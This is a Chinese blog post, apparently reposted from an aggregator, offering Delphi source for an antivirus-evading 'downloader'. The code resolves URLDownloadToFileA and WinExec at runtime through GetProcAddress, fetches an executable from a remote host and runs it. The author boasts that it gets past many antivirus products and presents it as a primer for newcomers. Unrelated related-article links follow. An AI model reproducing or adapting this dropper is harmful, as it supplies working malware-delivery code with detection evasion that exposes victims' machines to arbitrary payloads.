[免杀]Delphi源码免杀之函数动态调用 实现免杀的下载者
2013-12-30 23:44:21         来源:K8拉登哥哥's Blog  
自己编译这份代码看看 过N多杀软  没什么技术含量
只是发出来给不懂的人入入门 也防止有新人老是来问

ShellApi,URLMon 单元

//Delphi动态调用API函数
procedure TForm1.Button1Click(Sender: TObject);
var
   SourceFile:ansistring;
   DestFile :ansistring;
   down2:function(Caller: IUnknown; URL: PChar; FileName: PChar;
Longint: DWORD; StatusCB: IBindStatusCallback): Longint; stdcall;
   exe2:function(lpCmdLine: LPCSTR; uCmdShow: LongWord): LongWord; stdcall;

begin
    SourceFile:='http://172.16.126.152/UrlDown/k8team.exe';
    DestFile := 'f:\bbbaa.exe';

//原函数  下载完就执行 典型的下载者 常用函数 是个杀软都会杀得你连路都不见
    //UrlDownloadToFile(nil, PChar(SourceFile), PChar(DestFile), 0, nil);
    //WinExec(Pchar(DestFile),SW_SHOW);  //要和原函数对应

//动态调用
    @Down2:=GetProcAddress(LoadLibrary('URLMON.DLL'),'URLDownloadToFileA');
    Down2(nil, PChar(SourceFile), PChar(DestFile), 0, nil);

//动态调用
    @exe2:=GetProcAddress(LoadLibrary('kernel32.dll'),'WinExec');
    exe2(PChar(DestFile),SW_SHOW);

end;

//=================================================================================================================

附上函数原型

URLDownloadToFile 函数

function URLDownloadToFile;              external UrlMonLib name 'URLDownloadToFileA';

UrlMonLib = 'URLMON.DLL';
 
function URLDownloadToFile(Caller: IUnknown; URL: PChar; FileName:
PChar; Reserved: DWORD; StatusCB: IBindStatusCallback): HResult;
stdcall;

WinExec函数
 
function WinExec; external kernel32 name 'WinExec';

kernel32  = 'kernel32.dll';

function WinExec(lpCmdLine: LPCSTR; uCmdShow: UINT): UINT; stdcall;

[源码]Delphi源码免杀之函数动态调用 实现免杀的下载者的更多相关文章

  1. Delphi DLL的创建、静态及动态调用

    转载:http://blog.csdn.net/welcome000yy/article/details/7905463 结合这篇博客:http://www.cnblogs.com/xumenger/ ...

  2. [转]Delphi DLL的创建、静态 以及动态调用

    第一章  DLL简单介绍 由于在目前的学习工作中,需要用到DLL文件,就学习了下,在这里作个总结. 首先装简单介绍下DLL: 1,减小可执行文件的大小 DLL技术的产生有很大一部分原因是为了减小可执行 ...

  3. [源码]Delphi 5KB无输入表下载者

    [源码]Delphi 5KB无输入表下载者源码 PROGRAM Fun; type DWORD = LongWord; THandle = LongWord; BOOL = LongBool; LPC ...

  4. QQ2008自动聊天精灵delphi源码

    QQ2008自动聊天精灵delphi源码   unit Unit1;interfaceuses Windows, Messages, SysUtils, Variants, Classes, Grap ...

  5. 转换GMT秒数为日期时间格式-Delphi源码

    转换GMT秒数为日期时间格式-Delphi源码.收藏最近在写PE分析工具的时候,需要转换TimeDateStamp字段值为日期时间格式,这是Delphi的源码. //把GMT时间的秒数转换成日期时间格 ...

  6. http代理工具delphi源码

    http://www.caihongnet.com/content/xingyexinwen/2013/0721/730.html http代理工具delphi源码 以下代码在 DELPHI7+IND ...

  7. [PHP源码阅读]trim、rtrim、ltrim函数

    trim系列函数是用于去除字符串中首尾的空格或其他字符.ltrim函数只去除掉字符串首部的字符,rtrim函数只去除字符串尾部的字符. 我在github有对PHP源码更详细的注解.感兴趣的可以围观一下 ...

  8. EventBus源码解析 源码阅读记录

    EventBus源码阅读记录 repo地址: greenrobot/EventBus EventBus的构造 双重加锁的单例. static volatile EventBus defaultInst ...

  9. ios源码-ios游戏源码-ios源码下载

    游戏源码   一款休闲类的音乐小游戏源码 该源码实现了一款休闲类的音乐小游戏源码,该游戏的源码很简单,而且游戏的玩法也很容易学会,只要我们点击视图中的grid,就可以 人气:2943运行环境:/Xco ...

随机推荐

  1. 大数据入门到精通7--对复合value做reducebykey

    培训系列7--对复合value做reduce 1.做基础数据准备 val collegesRdd= sc.textFile("/user/hdfs/CollegeNavigator.csv& ...

  2. DOM 扩展

    1.选择符API,selectors API 可以使用CSS选择符匹配查找节点 1)  querySelector(selector),接受一个CSS选择符,返回调用该函数的节点后代中第一个匹配的元素 ...

  3. win7 win10下80端口被System进程占用的解决方法

    用如下方法可以解决System进程占用80端口的问题:打开RegEdit:开始-运行-输入regedit-调出注册表找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControl ...

  4. 查看SQL语句的真实执行计划

    DBMS_XPLAN包中display_cursor函数不同于display函数,display_cursor用于显示SQL语句的真实的执行计划,在大多数情况下,显示真实的执行计划有助于更好的分析SQ ...

  5. Linux下Mysql安装(tar安装)

    1.为数据库创建软件目录以及数据存放目录 #mysql软件目录 mkdir /software/ #mysql数据文件目录 mkdir /data/mysql 2.上传mysql-XXXXXX.tar ...

  6. 6L - 大菲波数

    Fibonacci数列,定义如下: f(1)=f(2)=1 f(n)=f(n-1)+f(n-2) n>=3. 计算第n项Fibonacci数值.  Input 输入第一行为一个整数N,接下来N行 ...

  7. centos 7安装java开发环境

    https://jingyan.baidu.com/article/29697b91660672ab20de3c15.html 自带版本是有问题的~

  8. Could not transfer artifact org.springframework

    无法从中心仓库获取该版本的信息, 从新下载: 1.配置eclipse中的maven  user setting路径为本地maven安装路径 配置阿里云镜像路径 <mirror> <i ...

  9. tensorflow学习之(一)预测一条直线y = 0.1x + 0.3

    #预测一条y = 0.1x + 0.3的直线 import tensorflow as tf import numpy as np #科学计算模块 ''' tf.random_normal([784, ...

  10. javascript 错误监控

    一.错误分类 1,即使运行错误:代码错误, 2.资源加载错误 二. 错误的捕获方式 1.即使运行错误的捕获方式 a. try catch       b.window.onerror 2.资源加载错误 ...